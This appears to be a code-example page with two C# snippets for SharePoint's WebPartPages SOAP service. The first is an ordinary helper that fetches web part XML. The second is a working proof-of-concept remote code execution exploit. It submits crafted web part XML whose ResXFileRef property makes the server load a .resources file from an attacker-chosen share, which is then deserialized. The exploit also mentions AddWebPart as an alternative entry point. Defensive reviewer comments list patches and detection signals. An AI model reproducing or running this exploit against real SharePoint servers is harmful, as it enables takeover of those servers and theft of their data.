Esempio n. 1
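        /// <summary>
        /// Calls the SharePoint WebPartPages SOAP service (<c>/_vti_bin/webpartpages.asmx</c>)
        /// and returns the XML of a single shared-storage web part on a page.
        /// </summary>
        /// <param name="storageKey">Storage key of the web part, in a format accepted by <see cref="Guid(string)"/>.</param>
        /// <param name="pageUrl">URL of the page hosting the web part; passed to the service unchanged.</param>
        /// <param name="weburl">Base URL of the web; a trailing slash is tolerated.</param>
        /// <returns>
        /// The web part XML returned by the service, or <see cref="string.Empty"/> when the call fails
        /// (the failure is logged through <c>WriteLine</c> and not rethrown).
        /// </returns>
        private string GetWebPartPropertiesServiceCall(string storageKey, string pageUrl, string weburl)
        {
            string webPartXml = string.Empty;

            try
            {
                // Strip trailing slashes so "http://host/site/" does not produce "//_vti_bin/...".
                string serviceUrl = (weburl ?? string.Empty).TrimEnd('/') + "/_vti_bin/webpartpages.asmx";

                // The proxy is disposed once the call completes instead of being left to the finalizer.
                // NOTE(review): assumes the proxy is a standard generated SOAP client (IDisposable) - confirm.
                using (var service = new WebPartPages.WebPartPagesWebService())
                {
                    service.Url = serviceUrl;

                    // Timeout is in milliseconds: 18000000 ms is five hours, kept as in the original.
                    // NOTE(review): a hung endpoint will block the caller for that long - confirm this is intended.
                    service.Timeout = 18000000;

                    if (IsSPOnline)
                    {
                        service.CookieContainer = cookieContainer;
                    }
                    else
                    {
                        service.Credentials = new System.Net.NetworkCredential(uName, pwds, domain);
                    }

                    // PreAuthenticate sends the credentials with the request rather than waiting for a
                    // challenge. NOTE(review): weburl decides where those credentials go; callers should
                    // pass only trusted, preferably https, endpoints.
                    service.PreAuthenticate = true;

                    // Actual web service call which returns the information in string format.
                    // new Guid(...) throws on a malformed storageKey; that is handled by the catch below.
                    webPartXml = service.GetWebPart2(pageUrl, new Guid(storageKey), Storage.Shared, SPWebServiceBehavior.Version3);
                }
            }
            catch (Exception ex)
            {
                // Best-effort lookup: log the failure and fall through to return the empty string.
                WriteLine("Error in GetWebPartPropertiesServiceCall: " + pageUrl);
                WriteLine(ex.Message);
            }

            return webPartXml;
        }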
Esempio n. 2
        /// <summary>
        /// Proof-of-concept client: authenticates to a SharePoint site's
        /// <c>/_vti_bin/WebPartPages.asmx</c> SOAP endpoint and submits a crafted web part
        /// definition to <c>RenderWebPartForEdit</c>, then prints the server's response.
        /// </summary>
        /// <remarks>
        /// Reviewer notes (defensive reading):
        /// - The request is authenticated with the supplied account, so the issue demonstrated here
        ///   is reachable by a site user rather than anonymously (the usage text shows an ordinary
        ///   site user; required permission level is not established by this listing).
        /// - The web part XML carries a property whose <c>type</c> attribute and value are both
        ///   chosen by the requester. The trust boundary of interest is the server resolving and
        ///   converting that requester-supplied type/value pair.
        /// - Relevant controls: apply the vendor security update for the affected SharePoint build
        ///   (identifier not stated on this page), block outbound SMB/WebDAV from SharePoint servers
        ///   to untrusted hosts, and review requests to WebPartPages.asmx whose web part XML names
        ///   unexpected property types where request bodies are inspected (WAF / reverse proxy).
        /// </remarks>
        /// <param name="args">
        /// Exactly five values: base URL, user name, password, domain, and a remote path to a
        /// .resources file. NOTE(review): the password is taken from the command line, where it is
        /// visible in process listings and shell history.
        /// </param>
        static void Main(string[] args)
        {
            try
            {
                // Anything other than exactly five arguments prints usage and exits.
                if (args.Length != 5)
                {
                    Console.WriteLine("Please provide necessary information:");
                    Console.WriteLine("SP_soap_RCE_PoC.exe <BaseUrl> <UserName> <Password> <Domain> <Remote_Path_To_Resource_File>");
                    Console.WriteLine("Example: SP_soap_RCE_PoC.exe http://Sharepont2019/siteofuser2/ user2 P@ssw0rd contoso //attackeVM/share/SP_soap_RCE_PoC.RCE_Resource.resources");
                    return;
                }

                string BaseURL    = args[0];
                string UserName   = args[1];
                string Password   = args[2];
                string Domain     = args[3];
                string RemotePath = args[4];

                // Assembly-qualified type name that is placed in the property's `type` attribute below.
                // NOTE(review): the server presumably resolves this requester-supplied type name when
                // converting the property value - that resolution is what a fixed server must restrict.
                var TC_Type = "System.Resources.ResXFileRef, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089";

                // Property value: the caller-supplied remote path followed by a ResourceSet type name.
                // NOTE(review): presumably the server-side conversion reads the file at that path, i.e.
                // the server would connect out to a host the requester chose; the variable name suggests
                // the file's contents then reach BinaryFormatter-style deserialization, which is unsafe
                // for untrusted data. Unexpected outbound file-share connections from a SharePoint
                // server are a useful detection signal.
                var BF_payload = RemotePath + "; System.Resources.ResourceSet, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089";

                // Endpoint is the site's WebPartPages SOAP service; trailing '/' and ' ' are trimmed first.
                var URL     = BaseURL.TrimEnd(new char[] { '/', ' ' }) + "/_vti_bin/WebPartPages.asmx";
                var service = new WebPartPages.WebPartPagesWebService {
                    Url = URL
                };

                // The call is made as the supplied domain account (authenticated request).
                service.Credentials = new NetworkCredential(UserName, Password, Domain);

                //Our WebPart xml with payload
                string webPartXml = @"<webParts>
  <webPart xmlns=""http://schemas.microsoft.com/WebPart/v3"">
    <metaData>
      <type name=""Microsoft.SharePoint.Portal.WebControls.BusinessDataListWebPart, Microsoft.SharePoint.Portal,Version=12.0.0.0,Culture=neutral,PublicKeyToken=71e9bce111e9429c"" />
      <importErrorMessage>Attack may be successful!</importErrorMessage>
    </metaData>
    <data>
      <properties>
        <property name=""SomeFakeProperty"" type=""" + TC_Type + @""">" + BF_payload + @"</property>
      </properties>
    </data>
  </webPart>
</webParts>";
                //If an attacker has Add and Customize permissions to only some specific page
                //he/she can use this method with pageUrl to this page
                //var pageUrl = "/sitename/SitePages/Home.aspx";
                //WebPartPages.Storage storage = WebPartPages.Storage.Personal;
                //var result = service.AddWebPart(pageUrl, webPartXml, storage);

                // Submits the XML to the service's RenderWebPartForEdit operation; the commented-out
                // lines above show AddWebPart as an alternative entry point taking the same XML, so
                // both operations are worth covering when reviewing logs or testing a fix.
                var result = service.RenderWebPartForEdit(webPartXml);

                Console.WriteLine(result);
            }
            catch (Exception e)
            {
                // Any failure (network, authentication, SOAP fault) is printed, not rethrown;
                // {0} is the full exception text and {1} repeats its message.
                Console.WriteLine("{0} Exception caught. with Message {1}", e, e.Message);
            }
        }